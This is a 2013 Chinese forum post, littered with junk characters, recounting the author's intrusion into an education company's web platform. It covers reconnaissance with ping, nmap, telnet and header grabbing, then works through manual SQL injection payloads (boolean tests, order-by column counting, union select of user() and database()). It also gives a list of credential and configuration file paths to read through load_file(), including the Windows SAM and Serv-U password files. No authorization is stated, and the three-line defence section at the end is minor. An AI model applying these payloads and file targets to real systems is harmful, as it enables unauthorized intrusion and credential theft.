找回密码
 立即注册
查看: 2735|回复: 0
打印 上一主题 下一主题

记一次Linux系统PHP注入入侵检测

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 22:23:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
题记:
9 X  n( @& a, ?一位朋友在某教育公司,一套网络教育平台。一年前,在2008年8月份的时候,我看到了这套平台,当时发现了个注入漏洞,测试了一下,得到一个可用帐户后就没有再继续下去。今天7月,又说到此事,我决定继续下去……
0 C7 V* H  X, t+ y* U* M第一步:获取需要的信息; d3 k' @9 Q3 g4 l. l
由于之前测试过,知道此系统某处存在SQL注入漏洞。但由于时隔一年,岁月的远去已经深深的隐藏了那个SQL注入漏洞的地址,现在需要重新收集服务器有用信息。
! F2 T( p, O+ f, J+ V9 G4 l& i; N注:以下为保护特用XXX代替敏感信息
1 S; y. P9 F6 x6 B5 y3 j8 U& U顺手先PING了一下他们的域名:& F$ ^; \2 `: L2 Z7 l
ping XXX.XXX.XXX.XXX(本文约定:用XXX.XXX.XXX.XXX代表测试IP和域名)
# g( o& N( p1 p1 w4 C64 bytes from *********: icmp_seq=1 ttl=246 time=1.87 ms9 x& |( {9 Y4 [( V- L7 f! E
顺便了解一下TTL,学好基础知识才能一路顺风:. [  S7 o3 c) N, i
TTL:(Time To Live ) 生存时间
8 a7 k* `1 w+ C  B指定数据包被路由器丢弃之前允许通过的网段数量。" L( h7 ^7 J0 z' e, _1 U
TTL 是由发送主机设置的,以防止数据包不断在 IP 互联网络上永不终止地循环。转发 IP 数据包时,要求路由器至少将 TTL 减小 1。
. N9 r! D6 W+ Q/ f使用PING时涉及到的 ICMP 报文类型, w8 u' t9 J" J' c/ V, y, n* d
一个为ICMP请求回显(ICMP Echo Request)7 ~  i) C! f7 Z2 l4 |) E0 w
一个为ICMP回显应答(ICMP Echo Reply)
: W# a5 ?5 T; j- I/ ZTTL 字段值可以帮助我们识别操作系统类型。
! R: a( Z3 z& V8 ?0 J' {# }  |! sUNIX 及类 UNIX 操作系统 ICMP 回显应答的 TTL 字段值为 255! R6 Q* e8 i& A+ I1 Z: Q8 n
Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64
  J6 U9 v0 z" p2 e' w微软 Windows NT/2K操作系统 ICMP 回显应答的 TTL 字段值为 128' z' W8 H" X/ a* S9 N) R$ u
微软 Windows 95 操作系统 ICMP 回显应答的 TTL 字段值为 32
: s$ K7 X# Y+ D+ n当然,返回的TTL值是相同的! p3 u6 m$ D7 o
但有些情况下有所特殊
/ y* a4 |1 H" HLINUX Kernel 2.2.x & 2.4.x ICMP 回显应答的 TTL 字段值为 64/ H, f9 Q9 E! k9 H" D
FreeBSD 4.1, 4.0, 3.4;
, [4 i% i7 s. g2 L# H7 ASun Solaris 2.5.1, 2.6, 2.7, 2.8;$ U( Y2 E3 j( U% T& ^! S) C
OpenBSD 2.6, 2.7,; g2 h5 s4 K. d: M2 ]& ?
NetBSD4 K; ]# J" g, x
HP UX 10.20
# R! j8 _( Z, Y  ^* Z4 NICMP 回显应答的 TTL 字段值为 255
8 m8 d% h2 P  t5 z3 I6 b! sWindows 95/98/98SE
6 o2 X. y' E" F' @Windows ME
* r5 }7 V( |4 m" HICMP 回显应答的 TTL 字段值为 32, D- a" y: h' L& m9 _1 Y5 m
Windows NT4 WRKS
+ T+ ]+ M" q: ~" ^1 nWindows NT4 Server4 M' d9 e* p8 N0 S# t& Z
Windows 2000
- V; O* L" a9 g) Z' ~2 w( gWindows XP5 ]2 a0 {' S9 u$ E: i& x
ICMP 回显应答的 TTL 字段值为 128' K# y) k$ E" I- [- T, d
这样,我们就可以通过这种方法来辨别操作系统
+ _7 N% D: f) n* Q( iTTL值的注册表位置HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Services\Tcpip\Parameters 其中有个DefaultTTL的DWORD值,其数据就是默认的TTL值了,我们可以修改,但不能大于十进制的255
4 A  n' w1 U% y6 y  [4 }  |- P用NMAP扫描一下:1 {; b1 E- T1 I3 @; N  r. V0 t1 c: n+ w
nmap -sT -O XXX.XXX.XXX.XXX
, E, S* Z  N( ~, C3 R0 V0 V6 ^如果没有装WinPcap则会弹出提示:
* ^1 Y% |# h# i5 A% J: ?7 uWARNING: Could not import all necessary WinPcap functions.  You may need to upgr+ @8 b/ k% \$ [& R3 o% n! X: Q
ade to version 3.1 or higher from http://www.winpcap.org.  Resorting to connect(" E, z9 V: p, I
) mode — Nmap may not function completely
* H, h% Z) i% _' {TCP/IP fingerprinting (for OS scan) requires that WinPcap version 3.1 or higher
$ K5 [2 f9 e9 ~) Hand iphlpapi.dll be installed. You seem to be missing one or both of these.  Win
! @) F& V  l& ^% apcap is available from http://www.winpcap.org.  iphlpapi.dll comes with Win98 an
$ N2 `" v( Q6 _1 rd later operating sytems and NT 4.0 with SP4 or greater.  For previous windows v
0 v* V# c1 |0 ]" f! Q, Jersions, you may be able to take iphlpapi.dll from another system and place it i) C0 W$ D& p* m& z3 v
n your system32 dir (e.g. c:\windows\system32).
; U! I! E7 ]4 v- W3 t' t* OQUITTING!
! U) f* t- [% ?( a) v4 p到这里下载: http://www.winpcap.org/install/bin/WinPcap_4_1_1.exe
! R: B& w. A/ A安装后继续执行刚才的命令,等待扫描完毕后得到入下信息:
& W: X0 U/ c  o, `Interesting ports on XXX.XXX.XXX.XXX:% Y$ S4 ^1 X5 w$ P8 q
Not shown: 986 closed ports) c) A& u6 z9 y. r0 K
PORT     STATE    SERVICE
7 V# t; M! D( g$ Y) l" L21/tcp   open     ftp
1 u8 F9 d' N$ R' I: H- D* B. k22/tcp   open     ssh6 B" e6 J( R( J. z" r
23/tcp   open     telnet' n' }3 d) ^* x& G# V5 |
80/tcp   open     http& i* H: S/ o$ G9 V8 v
111/tcp  open     rpcbind
9 n# a8 J  X* t135/tcp  filtered msrpc
" ^( ?8 W. Q: C139/tcp  filtered netbios-ssn
& T: ~: D9 V. x( b445/tcp  filtered microsoft-ds
2 R4 \. o8 x$ i# Z513/tcp  open     login
( j5 r2 k$ }0 f$ h9 \' y514/tcp  open     shell7 a7 E9 r& A: [- t
593/tcp  filtered http-rpc-epmap9 F6 c! |8 Y* f, X/ C, j7 g
1720/tcp filtered H.323/Q.931
; `0 R* Q- b1 V- \! l3306/tcp open     mysql
" |) ?* Y6 f* @% a2 R4444/tcp filtered krb524
$ N9 N" G, J8 DDevice type: WAP
; n% Z1 S6 T( e2 `* gRunning: Linux 2.4.X6 V4 M9 Y, a/ K5 b& g
OS details: DD-WRT (Linux 2.4.35s)
/ v3 F' I1 ?6 Y$ B$ UNetwork Distance: 13 hops6 V; Z8 ^1 k9 V) L
看到SSH22端口是开着的,打开putty试一下,看是否可以正常连接:7 G2 F  I+ K$ A- _- C" S( w/ g# b
login as:
1 I, c' @  j. ]* {$ a* C5 T6 {+ TTelnet23端口也是开着的,用telnet 命令链接一下:
: M, c" I' J) C7 b  I# Rtelnet XXX.XXX.XXX.XXX, [' L; q: b& A) ~/ a
提示:% Y" Z  |2 @) |8 N7 e  L) q9 x
Red Hat Enterprise Linux Server release 5.2 (Tikanga)
. ^+ ?- p; i$ k) R( U+ x1 F/ jKernel 2.6.18-92.el5PAE on an i686
9 b8 N2 K3 x1 d; T" C# @7 q+ Jlogin:  j% x$ n$ f+ L; |, z
获取HTTP头信息:
# J4 p! S% [0 P6 y4 Y在本地执行如下PHP代码
8 G8 w$ d2 S# u$ X9 U$ x9 |<?php' K6 a' ~+ V% e4 C/ ~& H
$url = ‘XXX.XXX.XXX.XXX’;  Q  J; O! Y4 k- x6 O; O* O
print_r(get_headers($url));- y, o, M8 J. Q- c
print_r(get_headers($url, 1));  C+ S9 ]/ I8 t5 i3 y, Q' f
?>' W6 s) N# w: N
将以上代码保存为PHP文件,执行:/ B% z; K( q. j3 ?# Q
Array ( [0] => HTTP/1.1 200 OK [1] => Server: nginx/0.7.61 [2] => Date: Mon, 02 Nov 2009 09:06:48 GMT [3] => Content-Type: text/html; charset=gb2312,gbk,utf-8 [4] => Content-Length: 75 [5] => Last-Modified: Thu, 20 Aug 2009 19:35:37 GMT [6] => Connection: close [7] => Accept-Ranges: bytes ) Array ( [0] => HTTP/1.1 200 OK [Server] => nginx/0.7.61 [Date] => Mon, 02 Nov 2009 09:06:48 GMT [Content-Type] => text/html; charset=gb2312,gbk,utf-8 [Content-Length] => 75 [Last-Modified] => Thu, 20 Aug 2009 19:35:37 GMT [Connection] => close [Accept-Ranges] => bytes )2 z3 k& x: @- w/ E! @
现在可以得出结论:
; g1 s! a3 i1 y3 R/ J系统版本:Red Hat Enterprise Linux Server release 5.2 (Tikanga)
/ i5 V9 ^3 y5 v0 j内核版本:Kernel 2.6.18-92.el5PAE on an i686
; G2 D9 S8 o$ d: k' ?( ^WEB服务器版本:nginx/0.7.61
% j* F% x& u% v% _; G- R9 [0 S% A第二步,开始测试寻找漏洞
; u- V  A  ^  l4 q分析是否存在注入漏洞,因为上次曾发现存在过,所以注入则是我们的首选。
& l* U9 t: A7 P1、敏感地址:站内存在有类似:http://www.fovweb.com/XXX.php?id=123 这种地址,属动态传参的, W. R' E. a: L: Z# g
2、测试方法:在地址后加 and 1=1 和 and 1=2 测试9 g! _9 T' o. E( G$ U0 M) b
http://www.fovweb.com/XXX.php?id=123 and 1=1 返回正常- o2 u' X, E! U
http://www.fovweb.com/XXX.php?id=123 and 1=2 返回错误# F- V( v+ t( A
恭喜,两次返回结果不同,则很有可能存在未过滤敏感字符而存在SQL注入漏洞,我们继续5 |3 c7 l: _* Z+ O; D, A
3、手工注入:
% o6 _6 A% I, C2 a: n8 i& ]) |$ G注入也应该有个思路,不能随便碰运气,要记住入侵检测不是靠运气而走下去的,要靠的是清晰的思路、过硬的技术、很全的知识面。1 U% x. `# s# y9 V' ?) m- e  y
3.1 猜测当前表字段数9 h( P3 X  o6 E+ s# o: H8 G# J
http://www.fovweb.com/XXX.php?id=123 and 1=1 order by 10
6 G1 n6 t! r6 {# V( W. |此处猜测有个简单的算法,都是有技巧的吗,呵呵; O% @5 i3 M! c, R; L# D+ R  a, A
算法简单如下:
" W' \2 \' c$ M# z第一步:根据页面信息,大概估算一个数值,这个是要靠一定的经验了;6 q0 s3 u) L8 y2 T
第二步:取中算法,好比是10,如果返回错误,则取中间值5进行下一次猜测;' ?7 M  R+ e0 V. n
需要注意:如果所选数值在字段数范围内即小于等于,则会(返回正常);如果所选数值在字段范围外即大于等于,则会(返回错误)。
3 f# ~9 o# g" k: I3 Q4 [6 ]以此来判断,是否过界,配合取中算法猜出字段数。& b1 m' g! _0 G; h
举例:
6 F; ?$ Y+ t! V2 o+ g0 khttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 3 返回正常
5 o+ p' L9 V$ O" q5 thttp://www.fovweb.com/XXX.php?id=123 and 1=1 order by 4 返回错误
7 a; J$ k$ G, _9 x$ \此时3则为我们要找的字段数。
- G9 c5 D$ I6 w( n+ ?& i+ V6 i# u3.2 配合union联合查询字段在页面所位置
. D$ a+ ]( d3 l& j我们已经知道了字段数为3,此时则可以做如下操作:8 D: u, R. y% x  V# O2 T$ w1 R4 ~
http://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,2,3, j+ R  ?( L1 u- q" p

8 T# |' H" a( W8 p- S' F# U这样就可以测试到哪些字段在页面上有所显示了,如图:
7 m, r+ H- q* |7 k6 W
% }$ \) W9 q2 p( N3.3 查敏感信息" U8 s; _0 }6 X8 N
这也是个思路问题,我们需要什么,其实到了这一步已经能做什么多事情了。
2 v+ \& W4 u9 K) |9 o. Z* a* nhttp://www.fovweb.com/XXX.php?id=123 and 1=2 union select 1,user(),database()
) n) }' @( ]6 ~7 s* W# g- F9 Z3.3.1 先查数据库用户、数据库名,以备后用,如图:9 }" c8 N0 b- y; B& S/ t0 N

+ p) r# G0 V" L& ^" W4 h得到数据库用户为root、数据库名为DBxx;
5 L5 I, m! U2 C! }- [6 C! v3.3.2 查配置文件
& O/ F9 y" E7 h. Z& z9 Z( ^& \查配置文件,就是指查看系统敏感的文件,如web服务器配置文件等。# T/ `, M. W" t. f: H. R
查看文件有一定的条件限制:
, b6 G. m# j/ X& y+ Y4 I9 H欲读取文件必须在服务器上, d; ?' |4 Q! F' S* y+ u/ P! b
必须指定文件完整的路径* l+ t# @4 I1 v7 m' B$ g
必须有权限读取并且文件必须完全可读
, Y) B) o. ~3 x, e+ l欲读取文件必须小于 max_allowed_packet2 u9 D; H3 X  B, l
MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件。
  H8 r9 [6 F! e6 f- K常用的一些:
; B0 g( Q" R' R( \9 K/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
. W9 C6 P6 v3 @+ R/ `! x" v/usr/local/apache2/conf/httpd.conf5 n% L# m# M; Q! p7 l
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
% ]) w& b& o% X8 I- I1 Q8 y/usr/local/app/php5/lib/php.ini //PHP相关设置' ], q. h& b5 U& W
/etc/sysconfig/iptables //从中得到防火墙规则策略
& N* c; V) ?; S! t/etc/httpd/conf/httpd.conf // apache配置文件
6 @9 b  x0 L+ J. `( |9 D- d/etc/rsyncd.conf //同步程序配置文件
! P" g. i* C4 C9 E1 m& j5 z/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP.
# `$ a# n  N* F/etc/my.cnf //mysql的配置文件
1 t* F4 B! m, G9 E$ ~6 n) O4 }4 V( r/etc/redhat-release //系统版本
4 U0 ^1 W& H0 P# F' c/etc/issue* ^, q, g' R5 V, o/ h
/etc/issue.net. a8 \( }& T' N3 O6 M3 M- i
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
3 a  u# y. q/ x+ ~+ ?' m$ H3 ^c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码7 e' x7 L1 s6 s4 ?3 v  o. r
c:\Program Files\Serv-U\ServUDaemon.ini
; o; O$ u  D  n! F) F. vc:\windows\my.ini //MYSQL配置文件) G5 v4 X% X( s  r$ X
c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件2 q$ f; h  Y! [( x6 y
等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件,7 N( f' {, z  V5 a1 T
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
! ?6 `+ q: t, p, P6 {2 M# mc:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此, ?+ h( ?1 A; P) ~5 U8 P
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
8 R1 }8 ~( ~! `- d+ VC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
! u+ v* \- }9 s/ J7 C' o//存储了pcAnywhere的登陆密码; b7 O# X- s; N3 e' D
由于之前得到信息,此台服务器是采用的nginx做的Web服务器,那我们就来试着找一下nginx的安装路径吧。
- f1 ]) W$ w; ~9 d; n这个没有技术性可言,纯靠经验和运气,由于很少用nginx不了解,我就先到网上搜索常用的安装路径,以及比较好的配置文档中的安装路径进行测试,最终,得到nginx安装路径“/usr/local/nginx/conf/nginx.conf”。  a' w& h4 v% d2 g, ^, X7 T
最后:防范措施) ~. X. T% L6 f4 D
1、修复PHP注入漏洞;
, J& @" T; k3 Q* J, A' k2、Mysql使用普通权限的用户;' }; I5 y; X  Q3 F  q: N5 j3 I. X
3、升级linux内核至最新版本;
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表